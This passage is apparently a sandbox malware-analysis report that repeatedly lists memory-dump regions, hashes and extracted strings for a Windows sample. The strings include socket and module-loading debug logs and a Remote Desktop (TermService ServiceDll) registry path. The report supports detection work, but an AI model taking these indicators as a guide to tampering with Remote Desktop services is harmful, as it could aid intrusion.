                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: AddressErrorLastProcfflushfwrite
                                                      • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                      • API String ID: 1224403792-3063791425
                                                      • Opcode ID: 1d2a1104b0b89a8048ea47d9da957c90726d30bd41cfabef788588989ec09e42
                                                      • Instruction ID: 33c2bf4e07e9282177ee4832a6375651c6b2ff7b42baf1a7417bb1e64d5027be
                                                      • Opcode Fuzzy Hash: 1d2a1104b0b89a8048ea47d9da957c90726d30bd41cfabef788588989ec09e42
                                                      • Instruction Fuzzy Hash: 83F081D0A0965741FA516749FC00AF5E6217F94BD8F844131DC4E0BB99EF6CE946E360
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true
                                                      • Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd
                                                      Similarity
                                                      • API ID: AddressErrorLastProcfflushfwrite
                                                      • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                      • API String ID: 1224403792-3063791425
                                                      • Opcode ID: c43f853d1552a5ff4b4b8e538862f6f42e45c1af654496a4ce4eebebe3d73d5e
                                                      • Instruction ID: 59eb383a07346334566f15ddaeb4bf27f032e097b5c1da8922038dac019c1184
                                                      • Opcode Fuzzy Hash: c43f853d1552a5ff4b4b8e538862f6f42e45c1af654496a4ce4eebebe3d73d5e
                                                      • Instruction Fuzzy Hash: 46F08B98B0F64BC2FA234F66A8207A552516F46FC8F484431ED4C0BB96EF2CE5668308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd
                                                      Similarity
                                                      • API ID: AddressErrorLastProcfflushfwrite
                                                      • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                      • API String ID: 1224403792-3063791425
                                                      • Opcode ID: 9f3b3311bb7c84406ef1a4f49946181f5cc7e38f5bca5baaaf70642eec26798c
                                                      • Instruction ID: 26b1435e8b424e667d3d6abc3823907796c2971f914d1d6ef5ef2a3e597f0379
                                                      • Opcode Fuzzy Hash: 9f3b3311bb7c84406ef1a4f49946181f5cc7e38f5bca5baaaf70642eec26798c
                                                      • Instruction Fuzzy Hash: 80F0D691B0A60F87FE118B45F8203BA52117F1AFC2F154431DD4D0B7A6FE2DE6468308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: AddressErrorLastProcfflushfwrite
                                                      • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                      • API String ID: 1224403792-3063791425
                                                      • Opcode ID: 1388ab471dc190be0225dc785bda30e6ec2d4b5f9edc99cec429349fc300884f
                                                      • Instruction ID: b5931d12749e4c9c03e6f25c8ee4f114d589e114125c558be94dd1ca1955a985
                                                      • Opcode Fuzzy Hash: 1388ab471dc190be0225dc785bda30e6ec2d4b5f9edc99cec429349fc300884f
                                                      • Instruction Fuzzy Hash: 5EF0D69AB0B603C1FA835746E9242B612D16F44BE4F184031CC8C4B756EE2CE542C348
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastLibraryLoadfflushfwrite
                                                      • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                                      • API String ID: 4085810780-3386190286
                                                      • Opcode ID: b2c0e035ea19c47a2298e704a7d5ddf11d637e265ee472e8a91510dc7967efe9
                                                      • Instruction ID: 61fe7e435ad3fcc34ef42c2c5095414997c23935b1f2fcad9ec8dad1bde24e4e
                                                      • Opcode Fuzzy Hash: b2c0e035ea19c47a2298e704a7d5ddf11d637e265ee472e8a91510dc7967efe9
                                                      • Instruction Fuzzy Hash: 15F09AA8F0B60F92FE239F16E8786B41250AF07FA4B490830C90C16B93FE5DA5858348
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastLibraryLoadfflushfwrite
                                                      • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                                      • API String ID: 4085810780-3386190286
                                                      • Opcode ID: 66375759403483c956752b67c058d5ec8f77d968b7f2071a1f9f258b69cb3baf
                                                      • Instruction ID: 8f06f431d0d73e2b9c2e16b024db95352a10b336706bdf570111f97f54e480b7
                                                      • Opcode Fuzzy Hash: 66375759403483c956752b67c058d5ec8f77d968b7f2071a1f9f258b69cb3baf
                                                      • Instruction Fuzzy Hash: 90F09A6BF0B68FD6ED13EF6AA860BB413109F5BF80B480430DD0C06357ED1CA5958348
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastLibraryLoadfflushfwrite
                                                      • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                                      • API String ID: 4085810780-3386190286
                                                      • Opcode ID: 2e131db1d26787532c87755231068629693fab26e255b15e7684d498ad26bbed
                                                      • Instruction ID: a18ff315723c17a5f0f3c10da2cecc19ef0d75a40682ff8792f770a65bf68b63
                                                      • Opcode Fuzzy Hash: 2e131db1d26787532c87755231068629693fab26e255b15e7684d498ad26bbed
                                                      • Instruction Fuzzy Hash: 17F09411F0B60390FE1AA72AB8A04A016006F04BF0F888438CC0C0A753EE2CEAC68358
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true
                                                      • Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastLibraryLoadfflushfwrite
                                                      • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                                      • API String ID: 4085810780-3386190286
                                                      • Opcode ID: eebc1a5d766f2079d4744cae82bcb5895402705acf0259eaf803f7c43288c065
                                                      • Instruction ID: 78cd91f4a83f1b3b7c64dd8f8f1ece98b25933666f8b307a3e34ddf7320403e1
                                                      • Opcode Fuzzy Hash: eebc1a5d766f2079d4744cae82bcb5895402705acf0259eaf803f7c43288c065
                                                      • Instruction Fuzzy Hash: 0DF03A19B0FA9F81E9539F66E860AA417506F07F84F884871DD0C17B53EFACA5959308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastLibraryLoadfflushfwrite
                                                      • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                                      • API String ID: 4085810780-3386190286
                                                      • Opcode ID: 0ba89c39d69df97c86f002b010dad634f4ea07f5c30fe7e47cfaeb9636bb7c5d
                                                      • Instruction ID: 3cfaa628df2f9baaac77771366c1c4816ec5c12cda34706d2ef12293ab152266
                                                      • Opcode Fuzzy Hash: 0ba89c39d69df97c86f002b010dad634f4ea07f5c30fe7e47cfaeb9636bb7c5d
                                                      • Instruction Fuzzy Hash: 39F01760F0BA0F9AEE219B56A8717B512506F17F82F490931C90D167A6FD6DA6868308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastfflushfwriteshutdown
                                                      • String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> shutdown failed(sock=0x%llx,chan=%d,WSAgle=%d)$sock_shutdown
                                                      • API String ID: 2143829457-932964775
                                                      • Opcode ID: 57c9f97ca487b04b81c438daf99dc390862ecc07b5533c1be0a8e36cbe07bb5e
                                                      • Instruction ID: 4cafa9019b940ed7448fb50125cdd16145c9bcbc7303f1e7d6f035b0d832e779
                                                      • Opcode Fuzzy Hash: 57c9f97ca487b04b81c438daf99dc390862ecc07b5533c1be0a8e36cbe07bb5e
                                                      • Instruction Fuzzy Hash: BFF0B4A3F0E84391F652A716E8640B61B516F617F4F644531D84D523A3EF2CE9468308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastLibraryLoadfflushfwrite
                                                      • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                                      • API String ID: 4085810780-3386190286
                                                      • Opcode ID: 2313a31a48575485783fdb08043dabcbb468791f70f24699168a91efbca71d3e
                                                      • Instruction ID: 6b6809dcf84eb18fcc713cad60da1c29caed6776218f56954b3f0251f23ed7f2
                                                      • Opcode Fuzzy Hash: 2313a31a48575485783fdb08043dabcbb468791f70f24699168a91efbca71d3e
                                                      • Instruction Fuzzy Hash: D5F0BE9AF0BA07C0FA83A75AE9349B122806F45BF8F080530CC4C17357ED1CE5428388
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastclosesocketfflushfwrite
                                                      • String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> closesocket failed(sock=0x%llx,WSAgle=%d)$sock_close
                                                      • API String ID: 152032778-2221966578
                                                      • Opcode ID: fd5638db403456608400802e24ae7212d6ef097be0609a3bcd527b22d91f44d7
                                                      • Instruction ID: ef02937177247d77fa55d6f5c79173f652c73336025a5635822401d32e963c8d
                                                      • Opcode Fuzzy Hash: fd5638db403456608400802e24ae7212d6ef097be0609a3bcd527b22d91f44d7
                                                      • Instruction Fuzzy Hash: 42F0B497F0A943C0FA02A7A6E8302B622409F21BF8F640331D53E513E3AE1CE8468309
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: Openstrcmpstrlen
                                                      • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$termsrv.dll
                                                      • API String ID: 679246061-1413152910
                                                      • Opcode ID: 8b43859d3751d4cfc2d3ca6901e27b712851a733f46dae56a8f51d62b50b9964
                                                      • Instruction ID: 510644335e0b3884e0eadb8a87a793c0ba32e81dc8d0c34634c67257b76d8bfe
                                                      • Opcode Fuzzy Hash: 8b43859d3751d4cfc2d3ca6901e27b712851a733f46dae56a8f51d62b50b9964
                                                      • Instruction Fuzzy Hash: 1221547970DA8B90EE328F10A4687F96351AF61B44F840432E75D427DBEF3DD649C608
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastfflushfwriteioctlsocket
                                                      • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                                      • API String ID: 325303940-110789774
                                                      • Opcode ID: 92e08edd5a5daf7e63f80c7fae908792988ffd416df67f6328fc22065d655c4c
                                                      • Instruction ID: 43e7869702244b93328e225611b873b80ca7b7df92004df46d68eac92f3bc51a
                                                      • Opcode Fuzzy Hash: 92e08edd5a5daf7e63f80c7fae908792988ffd416df67f6328fc22065d655c4c
                                                      • Instruction Fuzzy Hash: 7BF02868F0E10E47F3120F25E8243752150AB85F60F048231ED2E833D2EE7DE8468304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastfflushfwriteioctlsocket
                                                      • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                                      • API String ID: 325303940-110789774
                                                      • Opcode ID: 42c91134043cb90703c73a4a96ae32b202fc7c6bacb2177fd54e0efb9be6e790
                                                      • Instruction ID: 6c765bfd869f5920777f005b278e8f7561614396d446768946453d95361f3918
                                                      • Opcode Fuzzy Hash: 42c91134043cb90703c73a4a96ae32b202fc7c6bacb2177fd54e0efb9be6e790
                                                      • Instruction Fuzzy Hash: AAF0FC6BF0D64A86F711EF65B4103751160AF96F94F144131ED1D83396DE3CE846C704
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastfflushfwriteioctlsocket
                                                      • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                                      • API String ID: 325303940-110789774
                                                      • Opcode ID: 849be9b46ed46a113805540b2f03b8632a367a887648f154da5816180634933e
                                                      • Instruction ID: 6eb27086a03a9d32b088c171b3a5853ad9dde8b1cd0e54c9dd92af79bd00a6bd
                                                      • Opcode Fuzzy Hash: 849be9b46ed46a113805540b2f03b8632a367a887648f154da5816180634933e
                                                      • Instruction Fuzzy Hash: E6F0C862B0E11382F315571DA8101796160AB947F4F144131EC2D837A6DF3CD99A9709
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true
                                                      • Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastfflushfwriteioctlsocket
                                                      • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                                      • API String ID: 325303940-110789774
                                                      • Opcode ID: 30f1aec4ba2a2d192909e359bf6bdff320714bbc25446a42e4e5d0e7bd6f73df
                                                      • Instruction ID: 96c02df68d4a5746b3884654111ce6faac0515f6e5e605ce1455944889ed4f20
                                                      • Opcode Fuzzy Hash: 30f1aec4ba2a2d192909e359bf6bdff320714bbc25446a42e4e5d0e7bd6f73df
                                                      • Instruction Fuzzy Hash: 53F0C869B1E10782F3514F65A8503695260AF96B94F104571DC1E837A6DF3CD8468708
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastfflushfwriteioctlsocket
